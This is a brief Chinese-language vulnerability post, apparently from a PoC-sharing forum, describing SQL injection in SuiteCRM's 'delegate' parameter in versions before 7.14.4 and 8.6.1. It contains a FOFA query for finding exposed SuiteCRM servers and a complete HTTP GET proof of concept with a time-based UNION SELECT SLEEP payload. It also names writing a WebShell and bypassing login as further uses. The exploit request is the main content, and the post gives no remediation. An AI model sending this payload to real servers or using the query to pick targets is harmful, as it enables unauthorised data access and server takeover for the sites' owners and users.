漏洞描述
由于delegate参数输入验证不严格,攻击者可通过构造恶意请求,在该接口中拼接SQL注入语句,从而执行任意SQL操作,如查询敏感数据、写入WebShell、绕过登录限制等。
资产信息
fofa:title=”SuiteCRM”
影响版本:
影响版本
SuiteCRM < 7.14.4
SuiteCRM < 8.6.1
POC
GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept HTTP/1.1
Host: <目标地址>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: keep-alive
没有回复内容